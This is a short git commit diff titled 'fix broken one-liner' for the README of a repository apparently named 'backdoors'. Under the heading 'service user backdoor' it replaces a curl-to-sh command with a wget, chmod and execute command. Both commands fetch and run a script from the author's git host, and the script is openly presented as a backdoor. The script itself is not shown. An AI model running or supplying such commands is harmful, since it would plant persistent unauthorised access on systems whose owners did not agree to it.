fix broken one-liner

This commit is contained in:
hornet 2025-01-02 02:00:22 +05:00
parent 38b0e3e339
commit eb2541bab3

View file

@ -7,5 +7,5 @@ more sophisticated stuff coming in future, for now it's just a skiddie's trash b
### service user backdoor:
```
curl -fsSL https://git.lainlounge.xyz/hornet/backdoors/service_user.sh | sh
wget https://git.lainlounge.xyz/hornet/backdoors/src/branch/main/service_user.sh && chmod +x service_user.sh && ./service_user.sh
```